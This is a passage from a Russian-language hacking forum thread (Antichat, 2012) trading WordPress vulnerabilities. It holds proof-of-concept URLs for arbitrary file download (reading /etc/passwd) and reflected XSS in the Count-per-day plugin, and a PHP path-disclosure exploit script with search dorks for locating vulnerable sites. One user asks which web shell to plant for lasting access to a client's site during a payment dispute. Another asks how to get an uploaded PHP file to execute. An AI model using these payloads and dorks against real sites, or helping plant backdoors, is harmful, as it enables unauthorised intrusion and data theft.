ANTICHAT.RU    VIDEO.ANTICHAT.RU    AUDIT.ANTICHAT.RU    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  

Новая партнёрка без шейва! Знакомства, Гости Вконтакте, Диеты и т.д.



Продвину Ваш сайт в ТОП. Робот WebEffector.

Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в плагине Count-per-day
  #201  
Старый 13.02.2012, 07:25
Аватара для OxoTnik
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщения: 590
Провел на форуме:
1 месяц 1 день

Репутация: 6 ±



Отправить сообщение для  OxoTnik с помощью ICQ oxotnik@xmpp.ru
По умолчанию XSS в плагине Count-per-day

Цитата:
#Exploit Title: Count-per-day Wordpress plugin Arbitrary file download and XSS
#Version: < 3.1.1
#Software Link: http://wordpress.org/extend/plugins/count-per-day/
#Official fix: This advisory is released after the vendor has responded and fixed the issue.
#Description: User could call a remote script to download arbitrary file from the target system. Another script was vulnerable to non-persistent XSS

PoC for File download
192.168.0.1/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd

PoC for XSS
192.168.0.1/wp-content/plugins/count-per-day/map/map.php?map='")); </script><img src=http://www.bing.com//az/hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg>'

Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
 
Ответить с цитированием

  #202  
Старый 22.03.2012, 12:42
Аватара для morgan-id
morgan-id
Новичок
Регистрация: 17.02.2010
Сообщения: 3
Провел на форуме:
2 часа 1 секунду

Репутация: 0 ±

По умолчанию

подскажите , хостинг стоит на CPanel движок WordPress доступ есть полный и на хостинг админом и в админ панель WordPress
что можно сделать или какой шелл залить что бы я всегда имел доступ и знал пароль в случае его смены ?
проблема не оплаты за работу создания сайта , доступ пока у меня есть ко всему абсолютно но думаю скоро сменят пароли
за советы буду благодарен !
 
Ответить с цитированием

  #203  
Старый 02.04.2012, 21:36
Аватара для Mr.Snuffer
Mr.Snuffer
Участник форума
Регистрация: 02.07.2010
Сообщения: 138
Провел на форуме:
5 дней 19 часов 33 минуты

Репутация: 1 ±

Отправить сообщение для  Mr.Snuffer с помощью ICQ me@vkexc.ru
По умолчанию

Пагни, такое дело

Есть wordpress 3.3.1
Права на заливку - онли wp-upload
Залить пхп файл то я залил, но в этой дире он не выполнется.
Пытался залить туда .htaccess - безрезультатно.
Если нет прав на темплат, есть ещё способы?

upd: из плагинов стоят дискус и адсэнс, но в них походу ничего нет

Последний раз редактировалось Mr.Snuffer, 02.04.2012 в 21:39.
 
Ответить с цитированием

  #204  
Старый 08.04.2012, 20:11
Аватара для pr3v3d
pr3v3d
Новичок
Регистрация: 27.07.2010
Сообщения: 10
Провел на форуме:
2 дня 1 час 11 минут

Репутация: 0 ±

По умолчанию

Раскрытие путей в thumb.php
в модуле flashservices

дорка:flashservices/services/thumb.php
 
Ответить с цитированием

  #205  
Старый 10.04.2012, 23:21
Аватара для Osstudio
Osstudio
Banned
Регистрация: 17.04.2011
Сообщения: 732
Провел на форуме:
2 недели 3 дня

Репутация: 37 ±



Отправить сообщение для  Osstudio с помощью ICQ
По умолчанию

Раскрытие путей в WordPress >= 3.31
На данный момент, самая новая версия
Данная уязвимость присутствует во многих файлах из директории wp-includes, например, файл /wp-includes/admin-bar.php

Exploit (Exploit OsWpFp v.0.5):

PHP код:
 <form method=GET>
<
input type=text name=url>
<
input type=submit value="Check URL">
</
form>
<?
php
$url 
$_GET['url']; //URL Site
$site=$url.'/wp-includes/admin-bar.php';
$e = @file_get_contents($site);
if(
$e and $e !== "")
 {
$a = array("<br />\n<b>Fatal error</b>:  Call to undefined function add_action() in "," on line <b>39</b><br />","/wp-includes/admin-bar.php","<br />\n<b>Fatal error</b>:  Call to undefined function  add_action() in ","Fatal error: Call to undefined function add_action() in "," on line 39");
for(
$i=0$i count($a); ++$i)
 {
 
$e explode($a[$i],$e);
 
$e implode("",$e);
 }
echo 
"<hr size=1><span style=\"font-family: Calibri;\">Full path site <b>".$url."</b>:<br>".$e."<hr size=1>/*Exploit By Osstudio*/<br>\nICQ: 375647532</span>";
/*Exploit By Osstudio*/
}
else
 {
 echo 
"Ожидание ввода, либо не удалось использовать!";
 }
?> 

Веб версия эксплоита
Dork:
allinurl:.ru/wp-includes/admin-bar.php
allinurl:.com/wp-includes/admin-bar.php
(c) Osstudio

Последний раз редактировалось Osstudio, 10.04.2012 в 23:54.
 
Ответить с цитированием

  #206  
Старый 16.04.2012, 15:17
Аватара для fiin
fiin
Новичок
Регистрация: 25.01.2012
Сообщения: 8
Провел на форуме:
21 час 41 минуту 44 секунды

Репутация: 0 ±

По умолчанию

Цитата:
Сообщение от Osstudio  
Раскрытие путей в WordPress >= 3.31

Exploit (Exploit OsWpFp v.0.5):


Расскажи новичку по подробнее как воспользоваться, если не трудно
 
Ответить с цитированием

  #207  
Старый 16.04.2012, 15:20
Аватара для Ereee
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщения: 473
Провел на форуме:
3 недели 5 дней

Репутация: 66 ±

Отправить сообщение для  Ereee с помощью ICQ
По умолчанию

Цитата:
Сообщение от fiin  
Расскажи новичку по подробнее как воспользоваться, если не трудно

PHP интерпретатор нужен. Самое легкое, скачай Denwer и запускай.
 
Ответить с цитированием

  #208  
Старый 16.04.2012, 15:25
Аватара для fiin
fiin
Новичок
Регистрация: 25.01.2012
Сообщения: 8
Провел на форуме:
21 час 41 минуту 44 секунды

Репутация: 0 ±

По умолчанию

Цитата:
Сообщение от Ereee  
PHP интерпретатор нужен. Самое легкое, скачай Denwer и запускай.

благодарю
 
Ответить с цитированием

  #209  
Старый 16.04.2012, 17:07
Аватара для fiin
fiin
Новичок
Регистрация: 25.01.2012
Сообщения: 8
Провел на форуме:
21 час 41 минуту 44 секунды

Репутация: 0 ±

По умолчанию


Подскажите, что я должен делать дальше? Что это мне даст
 
Ответить с цитированием

  #210  
Старый 16.04.2012, 17:08
Аватара для HAXTA4OK
HAXTA4OK
Members of Antichat - Level 5
Регистрация: 15.03.2009
Сообщения: 758
Провел на форуме:
3 месяца 1 неделю 2 дня

Репутация: 169 ±



По умолчанию

Это тебе дает раскрытие путей, что позволяет узнать путь сервера , которые нужен в различных вариантов развития событий, но в твоем случае думаю ничего не дает
__________________
Уважаемые, в РОА только по приглашению, не стоит писать мне в ПМ "возьмите в РОА"

"На белом белом покрывале января, любимой девушке я имя написал, не прогоняй меня мороз,хочу побыть немного я , на белом белом покрывале января"
 
Ответить с цитированием
Ответ


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Сценарии/CMF/СMS 253 02.04.2012 09:05
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Сценарии/CMF/СMS 43 04.02.2012 19:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Сценарии/CMF/СMS 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 E-Mail 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel E-Mail 3 12.09.2005 10:07


Здесь присутствуют: 1 (пользователей - 1 , гостей - 0)
Sergio09
Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра


Быстрый переход


Powered by: vBulletin Version 3.0.x
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

ANTICHAT.RU